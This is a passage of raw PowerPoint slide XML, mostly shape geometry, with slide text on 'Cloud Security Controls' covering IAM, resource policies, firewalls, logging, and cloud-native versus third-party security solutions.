                  <a:lnTo>
                    <a:pt x="112013" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68419" y="8804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32813" y="32813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8804" y="68419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="112013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="672083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="672083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="112013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310211" y="68419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4286202" y="32813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4250596" y="8804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4207002" y="0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869186" y="3304794"/>
              <a:ext cx="4319270" cy="672465"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="672464">
                  <a:moveTo>
                    <a:pt x="112013" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4207002" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4250596" y="8804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4286202" y="32813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4310211" y="68419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="112013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="672083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="672083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="112013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8804" y="68419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32813" y="32813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68419" y="8804"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="112013" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="1905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856994" y="3774186"/>
              <a:ext cx="12544425" cy="2940050"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="2940050">
                  <a:moveTo>
                    <a:pt x="12302490" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="241554" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192852" y="4909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147500" y="18990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106467" y="41268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70723" y="70770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41235" y="106523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18972" y="147554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4904" y="192888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="241553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2698241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4904" y="2746907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18972" y="2792241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41235" y="2833272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70723" y="2869025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106467" y="2898527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147500" y="2920805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192852" y="2934886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241554" y="2939796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12302490" y="2939796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12351155" y="2934886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12396489" y="2920805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12437520" y="2898527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12473273" y="2869025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12502775" y="2833272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12525053" y="2792241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12539134" y="2746907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="2698241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="241553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12539134" y="192888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12525053" y="147554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12502775" y="106523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12473273" y="70770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12437520" y="41268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12396489" y="18990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12351155" y="4909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123024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856994" y="3774186"/>
              <a:ext cx="12544425" cy="2940050"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="2940050">
                  <a:moveTo>
                    <a:pt x="0" y="241553"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4904" y="192888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18972" y="147554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41235" y="106523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70723" y="70770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106467" y="41268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147500" y="18990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192852" y="4909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241554" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12302490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12351155" y="4909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12396489" y="18990"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12437520" y="41268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12473273" y="70770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12502775" y="106523"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12525053" y="147554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12539134" y="192888"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="241553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="2698241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12539134" y="2746907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12525053" y="2792241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12502775" y="2833272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12473273" y="2869025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12437520" y="2898527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12396489" y="2920805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12351155" y="2934886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12302490" y="2939796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241554" y="2939796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192852" y="2934886"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147500" y="2920805"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106467" y="2898527"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70723" y="2869025"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41235" y="2833272"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18972" y="2792241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4904" y="2746907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2698241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="241553"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="04668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2014854" y="3339541"/>
            <a:ext cx="12044045" cy="3141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5">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>am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type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sec</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-65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rit</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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dirty="0" sz="22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contr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80">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474980" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2095"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="474980" algn="l"/>
                <a:tab pos="475615" algn="l"/>
              </a:tabLst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used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by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clouds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as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on-premises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networks,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includes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IAM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endpoint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protection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for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virtual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instances.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474980" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1320"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="474980" algn="l"/>
                <a:tab pos="475615" algn="l"/>
              </a:tabLst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uses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resource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policies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govern</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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access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services.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474980" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1320"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="474980" algn="l"/>
                <a:tab pos="475615" algn="l"/>
              </a:tabLst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uses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firewalls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4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filter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traffic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between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hosts.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474980" indent="-343535">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1320"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="474980" algn="l"/>
                <a:tab pos="475615" algn="l"/>
              </a:tabLst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uses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logging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provide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audit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function.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43676" y="306451"/>
            <a:ext cx="41687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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cloud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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Controls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06567" y="760476"/>
            <a:ext cx="5724144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859660" y="3315080"/>
            <a:ext cx="12435205" cy="2943860"/>
            <a:chOff x="1859660" y="3315080"/>
            <a:chExt cx="12435205" cy="2943860"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1879853" y="3324605"/>
              <a:ext cx="6565900" cy="678180"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6565900" h="678179">
                  <a:moveTo>
                    <a:pt x="6452362" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="113029" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69008" y="8874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33083" y="33083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8874" y="69008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="113030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="678180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6565392" y="678180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6565392" y="113030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6556517" y="69008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6532308" y="33083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6496383" y="8874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6452362" y="0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879853" y="3324605"/>
              <a:ext cx="6565900" cy="678180"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6565900" h="678179">
                  <a:moveTo>
                    <a:pt x="113029" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6452362" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6496383" y="8874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6532308" y="33083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6556517" y="69008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6565392" y="113030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6565392" y="678180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="678180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="113030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8874" y="69008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33083" y="33083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69008" y="8874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113029" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="0466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869185" y="3792473"/>
              <a:ext cx="12416155" cy="2456815"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12416155" h="2456815">
                  <a:moveTo>
                    <a:pt x="12214225" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="201802" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155554" y="5333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113087" y="20524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75616" y="44357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44357" y="75616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20524" y="113087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5333" y="155554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="201802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2254885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5333" y="2301133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20524" y="2343600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44357" y="2381071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75616" y="2412330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113087" y="2436163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155554" y="2451354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201802" y="2456688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12214225" y="2456688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12260473" y="2451354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12302940" y="2436163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12340411" y="2412330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12371670" y="2381071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12395503" y="2343600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12410694" y="2301133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12416027" y="2254885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12416027" y="201802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12410694" y="155554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12395503" y="113087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12371670" y="75616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12340411" y="44357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12302940" y="20524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12260473" y="5333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122142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869185" y="3792473"/>
              <a:ext cx="12416155" cy="2456815"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12416155" h="2456815">
                  <a:moveTo>
                    <a:pt x="0" y="201802"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5333" y="155554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20524" y="113087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44357" y="75616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75616" y="44357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113087" y="20524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155554" y="5333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201802" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12214225" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12260473" y="5333"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12302940" y="20524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12340411" y="44357"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12371670" y="75616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12395503" y="113087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12410694" y="155554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12416027" y="201802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12416027" y="2254885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12410694" y="2301133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12395503" y="2343600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12371670" y="2381071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12340411" y="2412330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12302940" y="2436163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12260473" y="2451354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12214225" y="2456688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201802" y="2456688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="155554" y="2451354"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113087" y="2436163"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75616" y="2412330"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44357" y="2381071"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20524" y="2343600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5333" y="2301133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2254885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="201802"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="04668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063876" y="4145026"/>
            <a:ext cx="11057255" cy="1701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85" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-105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0" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>native</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-100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 b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>controls</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-343535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this,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controls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deployed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configured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using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CSP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web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console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CLI,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API.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2640"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="50" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Third-party</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-105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5" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>solutions</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" indent="-343535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typically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installed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as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virtual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instance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within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cloud.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63876" y="3359277"/>
            <a:ext cx="59334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5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2200" spc="-7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30">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>oud</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>native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cont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60">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ols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75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7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15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570">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>-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par</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1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dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>solutions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43676" y="306451"/>
            <a:ext cx="41687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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cloud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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Controls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06567" y="760476"/>
            <a:ext cx="5724144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902332" y="2347341"/>
            <a:ext cx="12563475" cy="2352675"/>
            <a:chOff x="1902332" y="2347341"/>
            <a:chExt cx="12563475" cy="2352675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1924049" y="2356866"/>
              <a:ext cx="4319270" cy="562610"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="562610">
                  <a:moveTo>
                    <a:pt x="4225290" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="93725" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57221" y="7358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27431" y="27431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7358" y="57221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="93725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="562355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="562355"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="93725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4311657" y="57221"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4291583" y="27431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4261794" y="7358"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4225290" y="0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924049" y="2356866"/>
